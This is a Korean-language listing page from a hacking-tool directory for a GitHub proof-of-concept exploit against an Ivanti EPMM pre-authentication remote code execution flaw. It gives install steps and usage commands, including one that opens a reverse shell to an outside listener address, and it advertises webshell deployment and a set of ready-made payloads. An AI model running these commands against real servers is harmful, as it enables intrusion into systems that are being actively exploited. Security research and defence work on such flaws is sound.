Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# CVE-2026-1281 및 CVE-2026-1340 개념 증명 - Bash 산술 확장을 통한 Ivanti EPMM 사전 인증 RCE

저장소 보기
616개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-1281 및 CVE-2026-1340 - Ivanti EPMM 사전 인증 RCE

License Python CVSS

⚠️ 면책 조항: 이 PoC는 교육 및 보안 연구 목적으로만 제공됩니다. 명시적 허가 없이 사용하는 것은 불법입니다.

🎯 설명

Ivanti Endpoint Manager Mobile(EPMM)에 영향을 미치는 CVE-2026-1281 및 CVE-2026-1340 취약점 악용을 위한 완전한 PoC(Proof of Concept)입니다. 이러한 취약점은 Bash 산술 확장(Bash Arithmetic Expansion) 메커니즘을 통해 인증 없이 원격 코드 실행(RCE)을 가능하게 합니다.

취약점

  • CVE-2026-1281 : /mifs/c/appstore/fob/ 엔드포인트의 코드 주입
  • CVE-2026-1340 : /mifs/c/aftstore/fob/ 엔드포인트의 코드 주입
  • CVSS 점수 : 9.8 (Critical)
  • 악용 상태 : 실제 환경에서 활발히 악용 중 (Zero-Day)
  • 🚀 기능

    • ✅ 자동화된 검증 프레임워크 (8개 테스트)
    • ✅ 사전 인증 RCE 악용
    • ✅ 자동 리버스 셸
    • ✅ 웹셸 배포
    • ✅ 50개 이상의 즉시 사용 가능한 페이로드
    • ✅ Blue Team용 탐지 스크립트
    • ✅ 완전한 문서화

    📦 설치

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 빠른 사용법

    root@kitploit:~
    # 취약점 테스트
    python3 exploit.py -t https://target.com -c
    
    # RCE 검증
    python3 exploit.py -t https://target.com --test-rce
    
    # 리버스 셸
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 문서

    • 전체 README - 상세 기술 문서
    • 사용 가이드 - 단계별 가이드
    • 페이로드 - 50개 이상의 페이로드 모음
    • Red Team 가이드 - 운영 시나리오

    🔗 참조

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs 분석
    • CVE-2026-1281
    • CVE-2026-1340

    👤 작성자

    Mehdi Le Deaut - 사이버보안 컨설턴트 | Red Team 전문가

    LinkedIn

    ⚖️ 라이선스

    이 프로젝트는 MIT 라이선스 하에 제공됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.

    🙏 감사의 말

    • 신속한 경보를 제공한 CERT-FR
    • 기술 분석을 제공한 Watchtowr Labs
    • 사이버보안 커뮤니티
    도구 다운로드